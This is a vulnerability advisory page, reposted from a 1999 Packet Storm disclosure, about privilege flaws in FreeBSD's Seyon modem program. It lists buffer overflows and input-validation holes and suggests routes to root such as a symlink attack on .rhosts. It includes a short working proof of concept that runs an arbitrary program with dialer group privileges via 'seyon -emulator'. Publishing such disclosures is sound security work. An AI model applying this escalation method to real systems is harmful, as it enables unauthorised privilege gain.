Lucene search
K

freebsd.seyon.txt

🗓️ 02 Dec 1999 00:00:00Reported by Brock TellierType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 34 Views

Seyon has severe vulnerabilities including buffer overflows and input validation issues, risking root.

Code
`Vuln #1 The Seyon Mess  
  
To summarize: Seyon was supposedly not meant to run with additional  
privileges. There are numerous problems with seyon and I've probably not  
found all of them. They are:  
  
Buffer Overflows:  
1. $HOME  
2. seyon -emulator $BUF  
3. seyon -modems $BUF  
4. many long text box input string overflows while in program  
Input Validation:  
1. seyon will search $PATH for "xterm" and "seyon-emu" and exec with  
fullprivs (as noted in previous advisory)  
2. seyon -emulator /program/to/execute/with/full/privs  
  
These privileges might be upgradable to root if you are able to a.  
trojan a dialer-writable file or b. use a symlink attack to clobber .rhosts or  
similar c. snoop device i/o.  
  
  
One of the methods to exploit seyon is shown below:  
  
bash-2.03$ echo 'void main() { system("/usr/bin/id"); }' > id.c  
bash-2.03$ gcc -o id id.c  
bash-2.03$ seyon -emulator ./id  
uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer), 1000(xnec)  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation